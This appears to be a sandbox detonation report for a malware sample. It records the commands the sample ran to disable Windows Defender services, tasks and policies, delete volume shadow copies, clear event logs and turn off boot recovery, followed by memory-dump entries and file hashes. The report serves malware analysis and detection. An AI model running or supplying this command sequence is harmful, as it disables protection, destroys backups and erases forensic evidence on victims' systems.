C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/588-54-0x0000000000000000-mapping.dmp
memory/544-55-0x0000000000000000-mapping.dmp
memory/1116-56-0x0000000000000000-mapping.dmp
memory/1072-57-0x0000000000000000-mapping.dmp
memory/1628-58-0x0000000000000000-mapping.dmp
memory/1688-59-0x0000000000000000-mapping.dmp
memory/1768-60-0x0000000000000000-mapping.dmp
memory/396-61-0x0000000000000000-mapping.dmp
memory/1108-62-0x0000000000000000-mapping.dmp
memory/1100-63-0x0000000000000000-mapping.dmp
memory/1056-64-0x0000000000000000-mapping.dmp
memory/1808-65-0x0000000000000000-mapping.dmp
memory/1360-66-0x0000000000000000-mapping.dmp
memory/1368-67-0x0000000000000000-mapping.dmp
memory/1196-68-0x0000000000000000-mapping.dmp
memory/1332-69-0x0000000000000000-mapping.dmp
memory/1204-70-0x0000000000000000-mapping.dmp
memory/1476-71-0x0000000000000000-mapping.dmp
memory/2032-72-0x0000000000000000-mapping.dmp
memory/556-73-0x0000000000000000-mapping.dmp
memory/1836-74-0x0000000000000000-mapping.dmp
memory/680-75-0x0000000000000000-mapping.dmp
memory/912-76-0x0000000000000000-mapping.dmp
memory/1748-77-0x0000000000000000-mapping.dmp
memory/1596-78-0x0000000000000000-mapping.dmp
memory/1272-79-0x0000000000000000-mapping.dmp
memory/768-80-0x0000000000000000-mapping.dmp
memory/1072-81-0x0000000000000000-mapping.dmp
memory/1344-82-0x0000000000000000-mapping.dmp
memory/1484-83-0x0000000000000000-mapping.dmp
memory/1084-84-0x0000000000000000-mapping.dmp
memory/1088-85-0x0000000000000000-mapping.dmp
memory/1832-86-0x0000000000000000-mapping.dmp
memory/1368-87-0x0000000000000000-mapping.dmp
memory/1604-88-0x0000000000000000-mapping.dmp
memory/1212-89-0x0000000000000000-mapping.dmp
memory/1776-90-0x0000000000000000-mapping.dmp
memory/832-91-0x0000000000000000-mapping.dmp
memory/1216-92-0x0000000000000000-mapping.dmp
memory/1700-93-0x0000000000000000-mapping.dmp
memory/1740-94-0x0000000000000000-mapping.dmp
memory/1764-95-0x0000000000000000-mapping.dmp
memory/544-96-0x0000000000000000-mapping.dmp
memory/1676-97-0x0000000000000000-mapping.dmp
memory/436-98-0x0000000000000000-mapping.dmp
memory/1080-99-0x0000000000000000-mapping.dmp
memory/1304-100-0x0000000000000000-mapping.dmp
memory/1548-101-0x0000000000000000-mapping.dmp
memory/880-102-0x0000000000000000-mapping.dmp
memory/292-103-0x0000000000000000-mapping.dmp
memory/928-104-0x0000000000000000-mapping.dmp
memory/1908-105-0x0000000000000000-mapping.dmp
memory/1552-106-0x0000000000000000-mapping.dmp
memory/1496-107-0x0000000000000000-mapping.dmp
memory/1468-108-0x0000000000000000-mapping.dmp
memory/1100-109-0x0000000000000000-mapping.dmp
memory/1236-110-0x0000000000000000-mapping.dmp
memory/1028-111-0x0000000000000000-mapping.dmp
memory/1952-112-0x0000000000000000-mapping.dmp
memory/1952-113-0x000007FEFC511000-0x000007FEFC513000-memory.dmp
memory/860-114-0x0000000000000000-mapping.dmp
memory/1104-116-0x0000000000000000-mapping.dmp
memory/1712-118-0x0000000000000000-mapping.dmp
memory/1888-119-0x0000000000000000-mapping.dmp
memory/1924-120-0x0000000000000000-mapping.dmp
memory/852-122-0x000007FEF38E0000-0x000007FEF443D000-memory.dmp
memory/852-123-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/852-124-0x00000000022A2000-0x00000000022A4000-memory.dmp
memory/852-125-0x00000000022A4000-0x00000000022A7000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 167090a23e64847bcc9891c90b399071 |
| SHA1 | 8bf9030451446825ac778dd9f0d42e564a5166ba |
| SHA256 | 2f6c04e155715a2efb59427bc2a4941c622fa9d51446b925a59a34cf323bbf48 |
| SHA512 | 529f1926c5741c272cafb437c7903e24f36fdbb0cc8ae2a0d8bdb93cd3a8be4386559f73ba2d09c18b36f3bd9e29081d782179427b7ea3cd090a6a28404c188a |
memory/852-128-0x00000000022AB000-0x00000000022CA000-memory.dmp
memory/2112-129-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp
memory/2112-131-0x0000000002452000-0x0000000002454000-memory.dmp
memory/2112-130-0x0000000002450000-0x0000000002452000-memory.dmp
memory/2112-133-0x000000000245B000-0x000000000247A000-memory.dmp
memory/2112-132-0x0000000002454000-0x0000000002457000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 16:49
Reported
2022-01-12 16:49
Platform
win10-en-20211208